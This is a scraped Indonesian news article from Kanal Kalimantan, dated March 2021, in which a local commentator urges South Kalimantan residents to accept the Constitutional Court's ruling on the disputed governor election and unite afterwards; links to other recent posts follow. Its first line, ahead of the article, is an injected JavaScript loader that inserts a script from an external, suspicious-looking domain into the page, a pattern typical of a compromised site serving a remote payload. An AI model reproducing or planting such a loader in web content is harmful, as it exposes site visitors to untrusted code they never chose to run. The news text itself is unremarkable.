(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Tunggu Kepemimpinan Baru Pasca Putusan MK, Warga Harus Bersatu Memajukan Banua


KANALKALIMANTAN.COM, BANJARMASIN – Mahkamah Konstitusi (MK) segera memutuskan perkara perselisihan hasil Pilkada Kalsel antara 17-24 Maret nanti.

Putusan MK yang bersifat final dan mengikat itu akan menghasilkan pasangan Gubernur dan Wakil Gubernur yang memimpin Kalimantan Selatan 2021-2024.

Tokoh Muda Kalsel, Surya Fermana meminta masyarakat Banua untuk menerima hasil Putusan Mahkamah Konstitusi nantinya dengan lapang dada.

“Masyarakat Kalsel harus bersiap menerima kepemimpinan baru. Mari bersama-sama membangun banua yang sedang terpuruk,” kata Surya Fermana dalam keterangannya kepada awak media, Senin (15/3/2021).

 

Pengamat Intelijen dan Militer tersebut juga menyebutkan bahwa masa kompetisi telah berakhir setelah keputusan MK yang bersifat akhir dan mengikat.

“Saya berharap, masyarakat yang terbelah selama pilkada agar bisa menyatu kembali dengan tenang dan damai. Bersatu padu mengatasi tantangan pemulihan pasca bencana alam, bersama atasi covid dan berupaya maksimal guna menggairahkan perekonomian,” tambahnya.

Ditambahkan, Pilkada kali ini semakin menunjukkan sikap masyarakat Banua yang dewasa dan mampu memelihara keamanan dan ketertiban di tengah perbedaan pilihan politik.

“Saya sangat salut. Masyarakat kita semakin dewasa dalam berpolitik. Sehingga situasi keamanan dan ketertiban tetap kondusif. Terimakasih warga Banua,” pungkasnya. (kanalkalimantan.com/rls)
Reporter : rls
Editor : kk


Al Ghifari

Recent Posts

Juara Umum di MTQ Provinsi, Ketua LPTQ Banjar Pastikan Bonus bagi Pemenang

KANALKALIMANTAN.COM, MARTAPURA - Kabupaten Banjar meraih sukses pada Musabaqah Tilawatil Quran (MTQ) Nasional XXXV Tingkat… Read More

1 jam ago

Pungut Sampah Suporter Timnas Pasca Nobar di Balai Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Suporter setia Timnas Indonesia di Kota Banjarbaru Kalimantan Selatan (Kalsel) kompak membersihkan… Read More

3 jam ago

Sah! Ini Nama 45 Calon Terpilih Anggota DPRD Kabupaten Banjar 2024-2029

Golkar dan Gerindra Masing-masing 8 Kursi, PDIP, Partai Gelora, dan PBB Kebagian 1 Kursi Read More

4 jam ago

Tok! KPU Banjarbaru Sahkan 30 Calon Terpilih Anggota DPRD Kota Banjarbaru, Ini Daftar Lengkapnya

13 Kursi Diisi Pendatang Baru, 17 Petahana Bertahan di Gedung Dewan Read More

7 jam ago

Buka Musrenbang RPJD 2025 – 2045, Ini Harapan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar menggelar Musrenbang… Read More

14 jam ago

Mahasiswa Prodi Gizi Belajar Penyelesaian Sengketa Medis di RSD Idaman

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 49 mahasiswa Diploma III Program Studi Gizi Poltekkes Kemenkes Banjarmasin melaksanakan… Read More

16 jam ago

This website uses cookies.